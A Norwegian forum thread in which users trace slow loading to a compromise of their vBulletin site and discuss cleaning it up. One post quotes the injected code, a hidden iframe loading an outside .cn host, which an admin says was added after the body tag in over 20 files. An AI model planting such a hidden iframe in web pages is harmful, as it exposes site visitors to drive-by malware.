Virus på forumet?

[Knut]

Og når jeg gikk til den url så kom dette,

 

[Bjørn]

Jeg har også hatt samme problemet når jeg har prøvd å logge meg inn på forum-delen de siste gangene. PCen blir bare stående å jobbe i evigheter, uten å komme inn. I dag klarte jeg å komme inn på forumet, så ser vel ut til at problemet er fikset

 

[gano]

Det ligger en skjult iframe i toppen av siden. Skru av CSS, så ser du den. Oppdaget akkurat at det samme hadde skjedd på klikkbart.no. Noen har skrevet til en fil, der skriverrettighetene er satt til 644. Jeg lastet bare opp igjen den aktuelle filen, fjernet noen korrupte temporære filer, så var alt tilbake igjen. Er ingen ekspert, så fatter ikke helt selv hvordan jeg skal sikre meg mot flere angrep.

 

[gano]

Her er iframen:


<iframe src=http://gcounter.cn style=display:none></iframe>

 

[TorsteinO]

oh, den der er sleip, gå inn på 404 Not Found så ser det ut som en side google eier, men en whois sier noe helt annet...

 

[Mr Vest]

Er det dette som er årsaken til at forumet laster så utrooolig treigt om dagene? Her hos meg tar det normalt nå for tiden opptil 20 sekunder før en tråd er ferdig lastet ned....

 

[webpiken]

Er det dette som er årsaken til at forumet laster så utrooolig treigt om dagene? Her hos meg tar det normalt nå for tiden opptil 20 sekunder før en tråd er ferdig lastet ned....

Det er jo ikke umulig det nei. Vi får håpe iframen snart fjernes?

Noe annet:
Hos meg har det alltid lastet tregt hvis jeg går inn på den _første_ siden i en tråd. Ellers er det supert.

Årsaken hos meg er det «Sponsede annonser»-feltet. Det kan ta mange sekunder før det laster. Men det er det nok OpenX som er årsaken til, det er (dessverre!) kjent for å være tregt.

Er det slik hos dere andre også?

 

[webpiken]

Jeg har allerede kjørt gjennom alt som er av skrivbare filer! Etter hva jeg vet skal det ikke være mulig å skrive til flere av dem!

Har du sjekket i databasen?

Jeg vet ikke hva vBulletin gjør, men mange applikasjoner lagrer jo kode i databasen, og kanskje de rett og slett har fått skrevet den inn der?

 

[Yngve Larsen]

vil tro det ligger i templaten i databasen.

 

[TorsteinO]

Men det er det nok OpenX som er årsaken til, det er (dessverre!) kjent for å være tregt.

2.6 skal visstnok ha kutta ganske bra ned, ble sluppet for bare noen dager siden

 

[clinton4]

Når eller hvis jeg får svar fra wixawin, så finner vi jo ut hvilken av deres partner som tjener på disse annonsene.

 

[Kenneth Dreyer]

Da skal det vaere fikset!

 

[TorsteinO]

ah, bra, hvor var det egentlig? i databasen eller en fil?

 

[Kenneth Dreyer]

Den var lagt inn i over 20 filer, ingen av dem er skrivbare! Hvordan dem har fått til det vet jeg ikke.. finner ikke noe informasjon om dem på nettet heller! Har kontakt DS for å høre om det kan være serveren som er hacket. Virker som om dem hadde scannet etter alle filer som hadde <body> tegnet i seg og lagt til en linje like etter. Jeg fant nemlig den iframe saken deres på noen template filer som ikke engang er tilgjengelig fra nett..

 

[TorsteinO]

Hm, har sjekka i et forum jeg har hosta hos domeneshop, ingenting der, men kan jo bare hende at det er på en annen server.